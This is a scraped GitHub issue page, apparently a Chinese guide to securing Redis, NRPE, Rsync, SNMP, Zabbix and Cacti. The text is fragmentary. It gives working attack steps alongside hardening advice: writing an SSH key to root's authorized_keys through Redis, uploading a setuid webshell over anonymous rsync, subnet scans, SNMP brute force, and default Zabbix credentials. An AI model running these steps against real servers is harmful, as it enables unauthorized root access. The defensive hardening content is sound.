We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Wasting time is robbing oneself.
Redis
webshell
wooyun
web
phpinfo
root
authorized_keys
ssh key
attack server
ssh-keygen -t rsa -C "redis" (echo -e "\n\n"; cat redis.pub; echo -e "\n\n") > redis.txt
redis-cli -h 192.168.192.133 flushall cat redis.txt | redis-cli -h 192.168.192.133 -x set pwn
redis
redis-cli -h 192.168.192.133
config set dir /root/.ssh/ config set dbfilename "authorized_keys" save exit
ssh
ssh -i redis root@192.168.192.133
nmap
6379
nmap -Pn -p6379 -sV x.x.x.x/24
nc ip 6379
info
ip
python
Nagios
NRPE
TCP
5666
2.15
exploit-db
ACL
Access Control List
NPRE
nmap -Pn -p5666 --open x.x.x.x/24
exp
Rsync
IP
rsync X.X.X.X:: #列出同步目录 rsync X.X.X.X::www #列出同步目录中的www目录 rsync -avz X.X.X.X::www/test.php /root #下载文件到本地 rsync -avz X.X.X.X::www/ /var/tmp #下载目录到本地 rsync -avz webshell.php X.X.X.X::www/ #上传本地文件到rsync服务器
chmod a+s webshell.php rsync -avz webshell.php X.X.X.X::www/
IPTables
iptables
iptables -A INPUT -i eth0 -p tcp -s 192.168.101.0/24 --dport 873 -m state --state NEW,ESTABLISHED -j ACCEPT iptables -A OUTPUT -o eht0 -p tcp --sport 873 -m state ESTABLISHED -j ACCEPT
rsyncd.conf
hosts allow
hosts allow = X.X.X.X #允许访问的IP
rsync
secrets file = /etc/rsyncd.secrets #密码文件位置,认证文件设置,设置用户名和密码 auth users = rsync #授权帐号,认证的用户名,如果没有这行表明是匿名,多个用户用,分割
873
nmap -n --open -p 873 X.X.X.X/24
rsync X.X.X.X::
Metasploit
auxiliary/scanner/rsync/modules_list
use auxiliary/scanner/rsync/modules_list set rhosts X.X.X.X/24 run
SNMP
community string
public
DDOS
UDP
CVE-2012-3268
oid
vim /etc/snmp/snmpd.conf =允许任何IP通过public来连接= com2sec notConfigUser default public =只允许1.1.1.1来使用public连接= com2sec notConfigUser 1.1.1.1 public
-p
snmpwalk -v 2c -p public ip
nmap -Pn -sU -p161 --script=brute 1.1.1.0/24
Zabbix
Admin/zabbix
guest
版本号 <= 2.0.8
Zabbix 版本 <= 2.0.8
httpmon.php
sql
Zabbix-server
WEB
Cacti
Superlinks
The text was updated successfully, but these errors were encountered:
No branches or pull requests
0x01 Drops Wiki
Redis
安全配置Redis
获取webshell
Redis
用户运行在wooyun
用户上,同时该服务器开放web
服务,如果已知该web
目录的绝对路径(通过phpinfo
、报错等获得),wooyun
用户对web
目录可写的话,则可以通过Redis
备份数据的过程写入webshell
Redis
获取服务器用户Redis
用户运行在root
用户上,root
用户对自己的authorized_keys
可以控制,可直接通过备份写入ssh key
attack server
生成一个公钥redis
ssh
的私钥登录了nmap
扫描Redis
的默认端口(6379
)nc ip 6379
Redis
的ip
,python
中存在Redis
模块,可以调用快速验证Nagios
安全配置NRPE
远程命令执行NRPE
是Nagios
用来检查其他节点的主机健康状态的插件,基本每个机器都会安装,它运行在TCP
的5666
端口,如果NRPE
插件允许任何主机都来连接,在配置时允许自定义命令,同时版本小于等于2.15
,则存在远程命令执行漏洞exploit-db
ACL
(Access Control List
访问控制列表)NPRE
插件5666
exp
去检测Rsync
安全配置Rsync
默认允许匿名访问,若未添加用户口令则可以进行匿名登录,建议对Rsync
的IP
访问进行限制以防止用户口令被猜解或泄露时造成损失Rsync
操作Rsync
提权Rsync
进程默认以root
权限启动,利用Rsync
同步文件的同时,可以保持原来文件的权限的特性,可以使用Rsync
进行提权IP
IPTables
防火墙给Rsync
的端口添加一个iptables
rsyncd.conf
使用hosts allow
设置只允许来源ip
rsyncd.conf
中添加rsync
用户权限访问nmap
扫描Rsync
默认的端口(873
)nmap -n --open -p 873 X.X.X.X/24
873
端口的主机后尝试连接Metasploit
中的rsync
进行扫描use auxiliary/scanner/rsync/modules_list set rhosts X.X.X.X/24 run
SNMP
安全配置community string
团体名,一个团体名下的信息,才有的交流,默认public
)SNMP
的DDOS
攻击UDP
协议,通过伪造来源IP
,达到获取大流量,进行DDOS
攻击CVE-2012-3268
获取设备的密码oid
,来获取设备的密码,从而达到控制设备的目的CVE-2012-3268
-p
为团体字符串nmap
扫描Zabbix
安全配置Zabbix
默认的口令为Admin/zabbix
, 或者存在弱口令,可以登录,登录后可以在后台自定义脚本,执行命令guest
账户guest
账户的,如果没有禁止,可以通过guest
账户登录,查看信息guest
账户同时版本号 <= 2.0.8
Zabbix 版本 <= 2.0.8
的时候,httpmon.php
页面存在注入,开启了guest
账户后可以直接访问,进行sql
注入攻击Zabbix
前台注入漏洞Zabbix
不要放在外网guest
用户Zabbix-server
,最好能够做ACL
访问限制WEB
应用,是否包含Zabbix
Cacti
安全配置Cacti
的登录界面没有验证码的限制,很容易被爆破,登录后,可以执行命令,获取服务器权限,同时泄漏监控主机的相关信息Superlinks
插件,具体查看exploit-db
Cacti
弱口令,尽量不放置在外网Cacti
进行升级WEB
应用,是否包含Cacti
The text was updated successfully, but these errors were encountered: